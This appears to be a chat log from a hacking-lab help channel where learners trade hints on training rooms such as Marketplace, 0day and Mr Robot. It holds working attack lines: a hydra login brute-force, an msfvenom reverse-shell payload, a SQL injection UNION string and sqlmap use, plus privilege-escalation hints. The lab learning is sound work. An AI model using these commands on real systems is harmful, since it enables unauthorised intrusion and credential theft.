I am researching hash types, i've tried a few obv ones, and it didn't seem to work

I'm on the MrRobot room and trying|| to get the password for the Worpress site, I'm using the fsocity.dic wordlist, I've done a "sort -u" on it to remove duplicates and I'm now running that list with "hydra -l Elliot -P new 10.10.216.86 http-post-form "/wp-login.php:log=^USER^&pwd=^PWD^: The password you entered for the username" -t 30". This however seems to take longer time then usual since when I searched on the topic they said that 15 min is to much.|| Any clues what I could be doing wrong?

Shriek: How does the cracking process work. It reads data in, does something, and continues .. It iterates yes?

@sour pivot try using wpscan. Much quicker

@fleet pike whats the most common hash type

Shriek: How does the cracking process work. It reads data in, does something, and continues .. It iterates yes?
@fleet pike [STATUS] 192.27 tries/min, 2884 tries in 00:15h, 8568 to do in 00:45h, 30 active

That was the latest^^

Can anybody helpl me with using msfvenom with a reverse shell? I'm missing something obvoius I'm afraid

@sour pivot try using wpscan. Much quicker
@oblique cliff I'll give it a try, thanks!

@ember berry can you show us what you’ve done?

I created the exec: msfvenom -p windows/shell_reverse_tcp LHOST=10.8.113.208 LPORT=5555 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

@fleet pike try the most obvious.

then uploaded it , and in a different msfconsole started the listener

Generate an exe-service payload, ot works better here because otherwise windows kills it @ember berry

He did

Smh

I tried that but it gave same result

@stuck fractal

Then try unstaged

how?

That is unstaged

James are you drunk

Wait

The listener was set to staged

The payload was unstaged

There's ya problem

Set them both to the same

@stuck fractal

Hmm, I looked a long time how to set up the listener... 😦

You need to set the payload to the same thing you generate

It needs to match up.

Blobberfree: i've tried *256 *512 *1sum and *5sum .. obv 512 is the wrong hash length. but 256 and *1sum, *5sum appear to be "in the zone" but i havent done an exact count on the answer mask . (i dont want to rely on this as a crutch just yet) ...i also tried all caps THM{HASHUPPER} (per the data in user.txt) and no caps THM{hashalllower} and thm{hashalllower} (for thoroughness) .. so i do not think im doing this correctly ..

Md

I have to re-ready your wise words... I don't fully understand the different reverse shells, but this nailed it!

Md works, just don't add extra lines

Throwback is good for it #notAnAd @ember berry

@stuck fractal owing to the awesome environment its being run in, i'm copying only the string from beginning T in THM to end } .. no whitespace and running the hash on another term. do i have to use the local systems hash algorithm?

can someone please verify if i got the syntax right for this

grep -r "flag" /etc/update-motd.d/

cyrax: Are you looking for contents of files, or files named flag?

or both

i am looking for the text "flag" inside all the files inside the directory

or trying to search inside all the files located in the directory

@fleet pike The algorithm is the same everywhere.

Then i must be giving it the wrong input... groovy, this helps

cyrax0101: Your grep appears to coincide with your intention

Then i must be giving it the wrong input... groovy, this helps
@fleet pike make sure you're not adding an additional newline

Maybe try without adding one at all

Or try with just one

No hard returns. i'll try adding one

@lusty shoal I think its grep -r /etc/update-motd-d/ "flag"

grep (string) (target) target can be file, directory, or stream

@fleet pike thanks u are correct

No show flag

Even if not real flag

Echo -n for no newlines

i was meant to search for "Flag" instead of "flag" hence wasn't getting anything

James: I'll be damned. its a diff value

Yes

Because echo adds a newline.

A newline is a byte

I went to delete it, and you beat me to it

Waterfall effect

hint to priv esc on marketplace?

Hey guys for marketplace || performing the sqli injection. I have found all three tables I'm now trying to enumerate the column names is this the right syntax
-1+UNION+SELECT+1,table_name,3,4+from+information_schema.columns+where+table_schema=database()+and+table_name='items'+limit+0,1 then 1,1 and so forth for each table name. Also I have to regain the cookie evertime I put a wrong injection very frustrating ||

So what’s your question / what do you need help with

Never mind I just can’t read geez

It's ok got it

Do I need a kali box for the metasploit room?

Or can I use the AttackBox

The attackbox is being fixed, the metasploit db is broken rn

oh ok

But you can kinda skip the database parts

that explains... well.. everything! lol

They're not really a part of the msf room

so i should be good to start on task 3 commands?

or should i come back to metasploit later

I don't know what task everything is in, just skip db_nmap etc

👍 thanks

Are this time allowed to ask markeplace room ?

I found some || bcrypt password but the password ||not complete

@sick sun Why ask if you're allowed to ask, if you're not going to wait for an answer?

Check for yourself. 72 hours from room release. The messages are in #announcements

@sick sun we are past the 72hours

@stuck fractal ok thanks

@visual burrow nice bro

If it's more than like 5 minutes with rockyou, you're doing it wrong

It's a platform rule.

Brute force will take less than 5 minutss.

Usually it take a couple secs with rockyou..5700xt.

This is bcrypt.

The platform rule still stands. 5 minutes for any brute force.

If it takes longer, then you're not meant to brute force it.

Is the "bonus challenge - the true ending" something im allowed to ask for a hint on?

@stuck fractal on what cpu?

@wild pier look for files that are out of place

Usually user files are in their home directory

Shouldn't really matter. 5 minutes on the THM Attack box is the new guidance. It definitely shouldn't be hours. @cedar axle

thanks @oblique cliff i found that one but haven't figured it it's quirk yet... ill keep digging thanks

I usually work on, if its not in rockyou its not brute forceable

Try short lists like fast track first

on my gpu rockyou takes a few seconds most of the time

Depends on the algorithm, bcrypt will be slow.

@oblique cliff its either the hidden one or the not hidden one but im not sure what either of them mean. the hidden one could be taken literally which i've tried I believe, and the non hidden one doesn't make a ton of sense if its a hint

assuming I'm even in the right directory lol

@stuck fractal true

what about python

can it be used for hacing

i am learning this but it was told me that it could only be used for web designing

Python is useful in many ways in InfoSec

ok

Python only used in web design What about machine learning

@random osprey || wildcard injection ||

@sick sun if you wasted too much time on them it means they are not useful.

@all any hints for Content Security Policy room?
Task 7 CSP Sandbox ? I am happy to discuss what I tried in DMs

in marketplace, is bruteforcing hashes a rabbit hole or right path?

rabbit

hey guys I'm havign a go at marketplace and have got to the ||sqli part and managed to enumerate all the table names and particular the users table and have a lot of hashes, have tried to crack with haschcat and rockyou but no luck, is there something I'm missing/could someone steer me in the right direction?||

@upper whale pm

can someone give me a nudge on the marketplace box i was able to get administrator access but i try to run sqlmap on the|| ip/admin?user=3|| nothing keep up and am sure to vulnerable to ||sqli||

@sinful plaza maybe look at the room tags 🙂

Okay, so I'm on the marketplace || I have the bcrypt password hash, anyone able to give me a hint on what to do with it because using hashcat on it does not look like it is going to work ||

@sinful plaza maybe look at the room tags 🙂
@trim haven ok noted

hello there, regarding the 0day room, || I already cracked the encrypted private key found in /backup but I can't seem to find any username related to it, really. I tried gobusting the /secret/ dir but nothing comes up, except index.html || suggestions?

nevermind, just ran nikto ❤️

Hi all, can someone give me a vague pointer as to task 3 on The Marketplace? I'm struggling to elevate to root. Is it related to the ||backup script||

Hi all, can someone give me a vague pointer as to task 3 on The Marketplace? I'm struggling to elevate to root. Is it related to the ||backup script||
@dawn tundra yup

Thanks @echo salmon my thinking is ||as the full path to tar has not been specified, I place a malicious file in its path to be executed, is that right? If so, I'm struggling to have it honour my custom path||

Thanks @echo salmon my thinking is ||as the full path to tar has not been specified, I place a malicious file in its path to be executed, is that right? If so, I'm struggling to have it honour my custom path||
@dawn tundra check dm

I have a problem in Upload Vulnerabilities room Task 11 "Challenge"
Simply, gobuster doesn't work. I didn't have any problems with any of the previous tasks, just the Challenge - have anyone had a similar problem?

My comrades....

I'm doing the CC:Pentesting room and I'm in the sql map part

I use sqlmap -u "10.10.94.111" --forms and it runs an exploit but I don't get anything like the name of the DB or how many columns and so on

What am I supposed to be doing here?

@torn leaf there is a walkthrough video linked in the task

and you have a l in the command to many

its uploadvulns not uploadvulnls

Oh... I would take me a while to notice that, thanks 😄

I use sqlmap -u "10.10.94.111" --forms and it runs an exploit but I don't get anything like the name of the DB or how many columns and so on
@cosmic phoenix check sqlmap --help for dumping database

👍

hey, i really need help on https://tryhackme.com/room/steelmountain, i'm totally lost on the privilege escalation..

find a script to enumerate everything and find a flaw

already done that

did you use winpeas @alpine lantern?

no

give it a go and then try checking this section ||[*] Checking service executable and argument permissions...||

|| i know that i need to change the path to the service with a .exe named ASCService.exe but i just can't upload it ||

sorry, that's not the name of the section in winpeas, reading my notes properly I see I actually used ||PowerUp.ps1 from PowerSploit||. Same info is in a winpeas though

i already use it

ahh, ok, so you're already there

just use Invoke-WebRequest to grab it from a python SimpleHTTPServer on your attackbox, ||upload it into c:\windows\temp\ first, stop the service and then copy it into place||

to grap what ?

|| and i copy it with cp ? ||

you said you had a new malicious service file called ACService.exe but you "just can't upload it"

i can but got a lot of problems

w8

can any one give me a hint after this
in @proven bridge room https://tryhackme.com/room/0day

have you stopped the service?

upload to a different directory first, stop the service, copy it across with cp in meterpreter

ye

ohhh

ok i'll try thx

don't think we're allowed hint for 72 hours on a new box @timid sequoia

Hi !! Can you help me onto 0day. I get the first flag. I'm trying to get root. I think I find the exploit but I don't know how to transfer and execute on the server ...

don't think we're allowed hint for 72 hours on a new box @timid sequoia
@median compass i didnt know that

no spoilers @white salmon, still a new box

Oh yeah sorry ..

I am doing Psycho room and got stuck, i have got ssh credentials but they are not working, any help is appreciated

What’s the error message you get when you try to login to ssh?

i got the whole line where left is username and right is password but i am trying various combinations still its not accepting i think there is some formatting or mistake i am doing

are you using the full found phrase @steady elm?

and keeping the case intact

its like this blacklistpasswordiszero, i am using blacklist and password zero or iszero

no, use the full phrase

as you found it

done thanks @median compass

happy hunting

yo

for marketplace #3, ||to login as michael, i tried to overwrite backup.sh with backup.tar via symlink, || but got Cannot open: Permission denied. the file permission is ok. what's wrong here? am i on the right track?

Anyone on Marketplace, I am on the cracking part of the hashes, I have tried hashcat, John and kraken but no luck.

I just finished Marketplace, ama (dm)

Anyone on Marketplace, I am on the cracking part of the hashes, I have tried hashcat, John and kraken but no luck.
@storm quiver If it's not in rockyou or takes more than 5 minutes or so, you're not meant to crack it

@pine ermine I will dm

sure! but @stuck fractal gave the right direction

@storm quiver If it's not in rockyou or takes more than 5 minutes or so, you're not meant to crack it
@stuck fractal thanks

@wicked rain lookup ||wildcard injection||

can i pm u on marketplace? @pine ermine

Yes, shoot

Hi !! Can you help me onto 0day. I get the first flag. I'm trying to get root. I think I find the exploit but I don't know how to transfer and execute on the server ...
@white salmon Check the ||$PATH||

can any one give me a hint after this
in @proven bridge room https://tryhackme.com/room/0day
@timid sequoia If you haven't already figured it out. Use ||Nikto||

That should help a bit 😉

got it

used and got the exploit

Awesome, great work!

Room completed thx !

@proven bridge can i send you a PM about the root part? I rooted the box but i don't know if it's the intended path.

Surely

@red minnow

Hello, anyone available for a question?

Just ask your question

Someone will answer if they can.

I'm in my first room (vulnversity) and on step #4 of Compromise the webserver I can

[...] can't connect to myself using the reverse shell

That's quite vague

Connection timed out (110)

What IP did you use?

the one I found when I go to http://10.10.10.10

which is the same under cmd -> ipconfig

You have a listener?

Wait, are you using windows?

ncat (windows)

yes

You need to allow it through the firewall

I think I have

I don't think you have.

Now I don't think I have either lmao

let me check

You will find it much easier to use Linux for this, particularly Kali.

Create a virtual machine

Run the VPN directly in the VM

Im very unfamiliar with kali, but I tried doing them on my raspbian, but the tools needed are a little too 'advanced' for that

It's just Linux

And the instructions are written for Linux

Yeah, unfamliar with Linux too 😄

There's a free room to Learn Linux

It's called Learn Linux

Alright, I'll do that

I'll first try to finish thius one in Windows

I'll let you know how it goes, thanks very much for your help so far

Good luck.

You were right, firewall stopped it 😒

@red minnow any chance i can message you about this 0day room i been at it for like 12 hours still kinda confused

@quaint star 0day has given some hints, but Rule 13 still applies here

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release, unless specifically allowed by the content creator.

@dWh2 The hint given by the room creator is a good one and the privilege escalation is easy to see. At the moment i can't help you, there are rules to follow 😄

what rule ??

no hints for 72 hours since the room has been released

use the search bar @quaint star for the hint that 0day gave to AlienOne

oh okay. i saw it says 48 days so i didnt know

Check #announcements

yeah i saw the ||$PATH|| but was confused

did you read the full post, cause that's not the hint he gave to AlienOne

oh so roughly like 4.5 hours left ? @stuck fractal

ah okay, i'll have a look thanks @median compass

happy hunting

oh right yeah i have used that and found many, as i said i've been at this for 12+hours lol

tried many also all to no avail

No, like 26 hours left

not released on the 19th ?

oh okay, yeah true

I made the same mistake. The date on the tryhackme webpage is probably when it was uploaded but no released.

my issue is not with user just root sadly

It's when the room was created

Not related to uploads @visual burrow

It's usually reset but Skidy was away

are you a mod her btw ninja

ffs @quaint star, would it not have been easier to start with that?

are you a mod her btw ninja
@quaint star Check my roles

yeah so sorry @median compass

uh im new to discord sorry ninja not sure what that is

on the right i dont see you on mods

Because I'm offline.

oh thats weird, how am i talking to you ?

is this a prerecorded response

I'm invisible. Because people keep DMing me if I go online.

AI at its finest

ah i see, ur popular !

you increase the load for the other moderators

much help

Btw..marketplace what a stunner.

I love the platform here at tryhackme, subscriber for life btw.

yup so great, such a great community too and the moderators seem to be so active

the CMs are active too

~~we never get any love 😭 ~~

aw sorry

you are great people also

we're an afterthought

ughhhhh

easy ctf is making me cry

I feel like I am missing something, I was able to find MULTIPLE vulnerabilities based on the versions of the apps running, but they are asking for a specific one... any hints on what I should be running to find out exactly which exploit to run

You mean simple ctf room?

vsftpd 3.0.3 exploit-db

no

https://tryhackme.com/room/easyctf

stupid copy paste from VM

Yup, simple ctf.

easy ctf in url title is simple ctf, sorry?

same thing lol

easyctf is the room code

ok... semantics here

anyway

any hints haha

I will use room title instead of code from now on.

I found stuff for OpenSSH and Apache versions, nothing for vsftpd

Got a hint, missed a step...

brute force the apache server to find directories

yea i did that just now, that was the step i missed lol

I got too focused on doing the nmap scan and looking at version exploits right away

usually you won't find a vulnerable SSH or FTP protocol, so searching for vulnerabilities for this services should be the last thing you do if you can't find something else.

I gotcha, I did find stuff for apache 2.4.18 and openSSH 7.2p which threw me off a bit XD

it there an other typical name for the private key then "id_rsa" that is one char longer?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

In Networking services exploiting telnet(task7) #5 they state to use “sudo tcpdump ip proto\icmp -i tunO” . I have tried on different Kali machines and always get no such device. Can someone explain what is wrong?

tun0 is the VPN adapter

If you're using your own kali machine, make sure you're connected to the VPN directly from the VM

If you're using THM's Kali/AttackBox, use the appropriate adapter there.

Hi all again, anyone in here already solved the CSP task 7 ?i am going nuts 😫

haha 0day pwned